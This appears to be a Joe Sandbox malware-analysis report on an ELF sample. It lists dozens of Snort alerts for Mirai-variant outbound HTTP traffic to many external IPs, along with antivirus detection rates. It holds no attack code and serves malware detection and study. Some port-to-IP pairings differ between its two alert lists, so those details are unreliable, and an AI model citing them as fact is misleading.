Timestamp:	02/25/24-19:02:19.139226
SID:	2839471
Source Port:	55722
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.213.164

Timestamp:	02/25/24-19:02:47.123310
SID:	2839471
Source Port:	58634
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.85.27.7

Timestamp:	02/25/24-19:02:19.062601
SID:	2839471
Source Port:	54734
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.110.146.110

Timestamp:	02/25/24-19:03:01.017365
SID:	2839471
Source Port:	42028
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.251.254.209

Timestamp:	02/25/24-19:03:22.735789
SID:	2839471
Source Port:	49084
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.237.168.201

Timestamp:	02/25/24-19:03:07.070063
SID:	2839471
Source Port:	47038
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.111.255.30

Timestamp:	02/25/24-19:03:01.003981
SID:	2839471
Source Port:	39074
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.199.233.119

Timestamp:	02/25/24-19:03:06.878152
SID:	2839471
Source Port:	49672
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.205.53.195

Timestamp:	02/25/24-19:03:12.605167
SID:	2839471
Source Port:	42260
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.87.45.157

Timestamp:	02/25/24-19:02:23.737771
SID:	2839471
Source Port:	47474
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.84.135.3

Timestamp:	02/25/24-19:03:10.163520
SID:	2839471
Source Port:	34586
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.198.166.119

Timestamp:	02/25/24-19:02:59.438342
SID:	2839471
Source Port:	55998
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.208.240.26

Timestamp:	02/25/24-19:03:38.559357
SID:	2839471
Source Port:	40584
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.175.173.75

Timestamp:	02/25/24-19:03:02.726982
SID:	2839471
Source Port:	44660
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.30.7.140

Timestamp:	02/25/24-19:02:41.013982
SID:	2839471
Source Port:	45688
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.251.122

Timestamp:	02/25/24-19:03:17.526942
SID:	2839471
Source Port:	50286
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.126.71.222

Timestamp:	02/25/24-19:03:23.237226
SID:	2839471
Source Port:	48814
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.85.242.170

Timestamp:	02/25/24-19:02:37.489008
SID:	2839471
Source Port:	60378
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.163.199.7

Timestamp:	02/25/24-19:02:57.393445
SID:	2839471
Source Port:	45122
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.56.25.22

Timestamp:	02/25/24-19:02:19.158292
SID:	2839471
Source Port:	59858
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.171.60.150

Timestamp:	02/25/24-19:02:28.721700
SID:	2839471
Source Port:	41874
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.25.126

Timestamp:	02/25/24-19:03:28.345156
SID:	2839471
Source Port:	51366
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.138.114.161

Timestamp:	02/25/24-19:02:49.908746
SID:	2839471
Source Port:	52932
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.127.86

Timestamp:	02/25/24-19:02:54.991690
SID:	2839471
Source Port:	48906
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.166.148.193

Timestamp:	02/25/24-19:02:45.199609
SID:	2839471
Source Port:	35616
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.165.99.56

Timestamp:	02/25/24-19:03:03.014561
SID:	2839471
Source Port:	50534
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.172.234

Timestamp:	02/25/24-19:02:36.331770
SID:	2839471
Source Port:	41554
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.104.240.7

Timestamp:	02/25/24-19:02:28.847544
SID:	2839471
Source Port:	55384
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.142.66.161

Timestamp:	02/25/24-19:03:07.062120
SID:	2839471
Source Port:	52586
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.111.201.226

Timestamp:	02/25/24-19:03:05.038247
SID:	2839471
Source Port:	60216
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.108.249

Timestamp:	02/25/24-19:02:21.707509
SID:	2839471
Source Port:	34728
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.164.112.148

Timestamp:	02/25/24-19:02:19.237661
SID:	2839471
Source Port:	34578
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.83.97.137

Timestamp:	02/25/24-19:02:37.901075
SID:	2839471
Source Port:	54950
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.148.112.212

Timestamp:	02/25/24-19:03:14.602549
SID:	2839471
Source Port:	60852
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.183.36.188

Timestamp:	02/25/24-19:02:57.496988
SID:	2839471
Source Port:	48256
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.164.195.191

Timestamp:	02/25/24-19:02:54.865097
SID:	2839471
Source Port:	60592
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.128.144.105

Timestamp:	02/25/24-19:03:36.139232
SID:	2839471
Source Port:	35918
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.35.31.183

Timestamp:	02/25/24-19:03:26.179200
SID:	2839471
Source Port:	49426
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.73.155

Timestamp:	02/25/24-19:03:21.320026
SID:	2839471
Source Port:	43508
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.155.17

Timestamp:	02/25/24-19:03:34.344364
SID:	2839471
Source Port:	35622
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.108.194

Timestamp:	02/25/24-19:03:07.107197
SID:	2839471
Source Port:	46856
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.209.101

Timestamp:	02/25/24-19:02:19.082059
SID:	2839471
Source Port:	59244
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.77.43

Timestamp:	02/25/24-19:02:31.914562
SID:	2839471
Source Port:	60282
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.227.153

Timestamp:	02/25/24-19:02:40.988685
SID:	2839471
Source Port:	58836
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.213.252.94

Timestamp:	02/25/24-19:02:57.447520
SID:	2839471
Source Port:	59818
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.126.90.235

Timestamp:	02/25/24-19:02:43.102765
SID:	2839471
Source Port:	42928
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.160.97.21

Timestamp:	02/25/24-19:02:44.907416
SID:	2839471
Source Port:	39338
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.17.17.36

Timestamp:	02/25/24-19:02:52.160193
SID:	2839471
Source Port:	50454
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.184.23.134

Timestamp:	02/25/24-19:03:12.751460
SID:	2839471
Source Port:	45828
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.85.242.170

Timestamp:	02/25/24-19:02:37.490018
SID:	2839471
Source Port:	60376
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.128.4.104

Timestamp:	02/25/24-19:03:12.766464
SID:	2839471
Source Port:	59290
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.50.249.181

Timestamp:	02/25/24-19:02:28.814262
SID:	2839471
Source Port:	37478
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.4.214.254

Timestamp:	02/25/24-19:03:21.134510
SID:	2839471
Source Port:	59090
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.57.42

Timestamp:	02/25/24-19:03:25.846556
SID:	2839471
Source Port:	55306
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.252.251

Timestamp:	02/25/24-19:02:57.428738
SID:	2839471
Source Port:	42614
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.176.100.116

Timestamp:	02/25/24-19:02:29.111084
SID:	2839471
Source Port:	48946
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.222.219.210

Timestamp:	02/25/24-19:02:45.212371
SID:	2839471
Source Port:	45194
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.198.101.19

Timestamp:	02/25/24-19:02:49.909871
SID:	2839471
Source Port:	55992
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.29.212.224

Timestamp:	02/25/24-19:02:50.348356
SID:	2839471
Source Port:	38658
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.227.38.117

Timestamp:	02/25/24-19:03:12.988276
SID:	2839471
Source Port:	45292
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.95.73.153

Timestamp:	02/25/24-19:03:03.351789
SID:	2839471
Source Port:	38074
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.121.164.19

Timestamp:	02/25/24-19:02:29.117951
SID:	2839471
Source Port:	33936
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.30.95

Timestamp:	02/25/24-19:03:13.008734
SID:	2839471
Source Port:	51244
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.85.86.117

Timestamp:	02/25/24-19:03:26.143213
SID:	2839471
Source Port:	59344
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.79.106.197

Timestamp:	02/25/24-19:03:08.639432
SID:	2839471
Source Port:	55276
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.173.181.239

Timestamp:	02/25/24-19:02:54.351845
SID:	2839471
Source Port:	42556
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.213.226.7

Timestamp:	02/25/24-19:03:04.913936
SID:	2839471
Source Port:	35992
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.216.129.249

Timestamp:	02/25/24-19:02:41.077358
SID:	2839471
Source Port:	34730
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.111.40

Timestamp:	02/25/24-19:03:04.905321
SID:	2839471
Source Port:	52108
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.16.247.108

Timestamp:	02/25/24-19:02:31.021269
SID:	2839471
Source Port:	55316
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.17.17.36

Timestamp:	02/25/24-19:02:52.157543
SID:	2839471
Source Port:	50456
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.221.35.196

Timestamp:	02/25/24-19:02:36.432909
SID:	2839471
Source Port:	59290
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.165.132.141

Timestamp:	02/25/24-19:02:19.343371
SID:	2839471
Source Port:	43494
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.7.225

Timestamp:	02/25/24-19:03:07.074022
SID:	2839471
Source Port:	45318
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.231.150

Timestamp:	02/25/24-19:02:58.051286
SID:	2839471
Source Port:	56212
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.231.150

Timestamp:	02/25/24-19:03:00.522561
SID:	2839471
Source Port:	56270
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.48.155.162

Timestamp:	02/25/24-19:03:35.563701
SID:	2839471
Source Port:	57720
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.168.180.48

Timestamp:	02/25/24-19:02:42.623315
SID:	2839471
Source Port:	37932
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.65.65.138

Timestamp:	02/25/24-19:03:29.875241
SID:	2839471
Source Port:	59330
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.186.214.117

Timestamp:	02/25/24-19:03:31.841333
SID:	2839471
Source Port:	40540
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.237.182

Timestamp:	02/25/24-19:03:04.869691
SID:	2839471
Source Port:	43264
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.18.29.215

Timestamp:	02/25/24-19:02:50.280123
SID:	2839471
Source Port:	36248
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.157.9

Timestamp:	02/25/24-19:02:54.321188
SID:	2839471
Source Port:	37150
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.22.93

Timestamp:	02/25/24-19:02:42.642451
SID:	2839471
Source Port:	38458
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.85.206

Timestamp:	02/25/24-19:03:10.178366
SID:	2839471
Source Port:	52500
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.231.150

Timestamp:	02/25/24-19:03:13.642587
SID:	2839471
Source Port:	56644
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.250.44

Timestamp:	02/25/24-19:03:22.735437
SID:	2839471
Source Port:	59064
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.85.216.8

Timestamp:	02/25/24-19:03:12.575077
SID:	2839471
Source Port:	33824
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: qynd1m1ejo.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: qynd1m1ejo.elf	ReversingLabs: Detection: 71%
Source: qynd1m1ejo.elf	Virustotal: Detection: 68%			Perma Link

Machine Learning detection for sample

Source: qynd1m1ejo.elf

Joe Sandbox ML: detected

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54734 -> 95.85.27.7:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59244 -> 95.217.209.101:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48418 -> 95.217.145.162:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58466 -> 95.86.72.116:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34578 -> 95.164.112.148:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40882 -> 95.56.81.125:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59858 -> 95.56.25.22:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47292 -> 95.90.146.125:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43494 -> 95.165.132.141:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55722 -> 95.100.51.55:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57128 -> 95.216.165.191:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34728 -> 95.217.108.249:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50106 -> 95.84.209.239:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40610 -> 95.101.143.7:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47474 -> 95.87.45.157:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54048 -> 95.213.202.26:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50474 -> 95.215.240.138:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41874 -> 112.171.60.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37478 -> 112.50.249.181:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47156 -> 112.31.250.19:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45318 -> 112.13.96.73:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55384 -> 112.104.240.7:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48946 -> 112.176.100.116:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33936 -> 112.121.164.19:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49994 -> 112.196.22.241:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55316 -> 112.16.247.108:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58600 -> 112.65.171.122:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60282 -> 88.221.77.43:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43394 -> 95.217.68.189:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41554 -> 95.216.172.234:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39322 -> 88.99.210.141:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56020 -> 95.86.87.72:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59290 -> 95.221.35.196:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60378 -> 112.85.242.170:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60376 -> 112.85.242.170:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54950 -> 88.83.97.137:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46112 -> 112.214.239.215:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54920 -> 88.208.215.191:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34730 -> 88.216.129.249:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58836 -> 88.99.227.153:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45688 -> 88.30.7.140:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38480 -> 88.221.214.188:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38500 -> 88.221.214.188:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37932 -> 95.168.180.48:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38458 -> 95.217.22.93:80
